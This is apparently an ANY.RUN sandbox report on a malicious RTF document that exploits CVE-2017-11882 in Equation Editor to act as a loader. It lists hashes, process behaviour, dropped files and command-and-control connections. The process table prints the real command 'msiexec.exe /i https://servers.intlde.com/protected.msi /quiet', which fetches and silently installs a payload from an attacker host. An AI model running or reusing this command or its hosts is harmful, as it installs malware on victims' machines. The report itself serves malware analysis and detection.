analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

protected.doc

Full analysis: https://app.any.run/tasks/01c5842e-34ea-4bda-935f-8c4dfd07f107
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 20, 2019, 07:02:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

C5B5C57A2CC8AE78D2D83B6CC0003154

SHA1:

805B7262F471C64EB5E40D94641D946E3875F780

SHA256:

743B5C1132BFB088BD5693AB6D38B2CE05F89AA78975EA2AF5DAF61FC06618BC

SSDEEP:

768:s7Kf2sdrM3xaSybdRZXZWkWZNLeRO28LfNCJ1C6NG0xGR4liA0rNdDuRHHWPdCoK:sxxQW3yRsyGEV5e3+JhgGt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2976)
      • EQNEDT32.EXE (PID: 1804)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2176)
      • cmd.exe (PID: 1676)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 1008)
    • Changes the autorun value in the registry

      • MSI786B.tmp (PID: 2592)
    • Application was dropped or rewritten from another process

      • images.exe (PID: 676)
      • images.exe (PID: 1420)
    • Runs app for hidden code execution

      • images.exe (PID: 676)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1008)
      • MSI786B.tmp (PID: 2592)
    • Reads the machine GUID from the registry

      • msiexec.exe (PID: 1008)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2976)
      • EQNEDT32.EXE (PID: 1804)
      • images.exe (PID: 676)
    • Executed via COM

      • EQNEDT32.EXE (PID: 2976)
      • EQNEDT32.EXE (PID: 1804)
    • Reads Internet Cache Settings

      • msiexec.exe (PID: 1008)
    • Creates files in the user directory

      • MSI786B.tmp (PID: 2592)
    • Application launched itself

      • images.exe (PID: 1420)
    • Starts itself from another location

      • MSI786B.tmp (PID: 2592)
  • INFO

    • Application was crashed

      • EQNEDT32.EXE (PID: 1804)
      • EQNEDT32.EXE (PID: 2976)
    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 2180)
    • Reads settings of System Certificates

      • msiexec.exe (PID: 1008)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2180)
    • Application was dropped or rewritten from another process

      • MSI786B.tmp (PID: 1344)
      • MSI786B.tmp (PID: 2592)
    • Application launched itself

      • MSI786B.tmp (PID: 1344)
    • Starts application with an unusual extension

      • MSI786B.tmp (PID: 1344)
      • msiexec.exe (PID: 1008)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Saveprevpict: -
InternalVersionNumber: 57435
CharactersWithSpaces: 113
Characters: 97
Words: 17
Pages: 1
TotalEditTime: 12 minutes
RevisionNumber: 23
ModifyDate: 2018:07:03 09:28:00
CreateDate: 2018:01:23 22:18:00
LastModifiedBy: Richard
Author: obidah qudah
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
13
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msi786b.tmp no specs msi786b.tmp images.exe no specs images.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2180"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\protected.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.5123.5000
2976"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1676cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet C:\Windows\SysWOW64\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1756msiexec.exe /i https://servers.intlde.com/protected.msi /quiet C:\Windows\SysWOW64\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1008C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1804"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2176cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet C:\Windows\SysWOW64\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1618
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2288msiexec.exe /i https://servers.intlde.com/protected.msi /quiet C:\Windows\SysWOW64\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1618
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1344"C:\Windows\Installer\MSI786B.tmp"C:\Windows\Installer\MSI786B.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2592"C:\Windows\Installer\MSI786B.tmp"C:\Windows\Installer\MSI786B.tmp
MSI786B.tmp
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
1 669
Read events
1 476
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
2
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4998.tmp.cvr
MD5:
SHA256:
1008msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF716150C76752D455.TMP
MD5:
SHA256:
1008msiexec.exeC:\Config.Msi\1b7628.rbs
MD5:
SHA256:
1008msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFC2A5BB2275B09E2B.TMP
MD5:
SHA256:
1008msiexec.exeC:\Windows\Installer\MSI6C14.tmpexecutable
MD5:E217E120974A810CEB878174A03E4F8D
SHA256:57F4EE7E7B7101549736FE70D52255A47FCBE84D261D4F50387449C35B4145BF
1008msiexec.exeC:\Windows\Installer\1b7627.ipibinary
MD5:E3C3F4954F58A0E2868F207F34AD638C
SHA256:497D980CCF5B9CCDF5112BCE2D2620E74AEBF8ACCB6EBB3E54565411176B51D0
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$otected.doc.rtfpgc
MD5:B80BB3853FE520ADFC01043C4827C029
SHA256:682CFD130BC0FA121F58470680BBD78864C8DD340EE462D5E716F76450921B42
1008msiexec.exeC:\Windows\Installer\MSI7760.tmpbinary
MD5:DE5F4E45B2BBE3880F48435011F9535F
SHA256:B8B00DF3CC173C96FAC3063D6DADE9E2C1995B4DCBE7644BC36422B0BB4F09FB
1008msiexec.exeC:\Windows\Installer\MSI786B.tmpexecutable
MD5:B37BF3D96C5CCCBB6A84592E9541B4E2
SHA256:334A1B9DD06DDD8BB9013773A640DF779D44F426CCF0B20203B6D19C5C1E02EF
2592MSI786B.tmpC:\Users\admin\AppData\Roaming\images.exeexecutable
MD5:B37BF3D96C5CCCBB6A84592E9541B4E2
SHA256:334A1B9DD06DDD8BB9013773A640DF779D44F426CCF0B20203B6D19C5C1E02EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
41
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1008
msiexec.exe
GET
200
198.252.108.62:443
https://servers.intlde.com/protected.msi
CA
executable
906 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1008
msiexec.exe
198.252.108.62:443
servers.intlde.com
Hawk Host Inc.
CA
unknown
676
images.exe
88.202.177.235:5200
fada101.servehttp.com
UK-2 Limited
NL
malicious

DNS requests

Domain
IP
Reputation
servers.intlde.com
  • 198.252.108.62
unknown
fada101.servehttp.com
  • 88.202.177.235
malicious

Threats

No threats detected
No debug info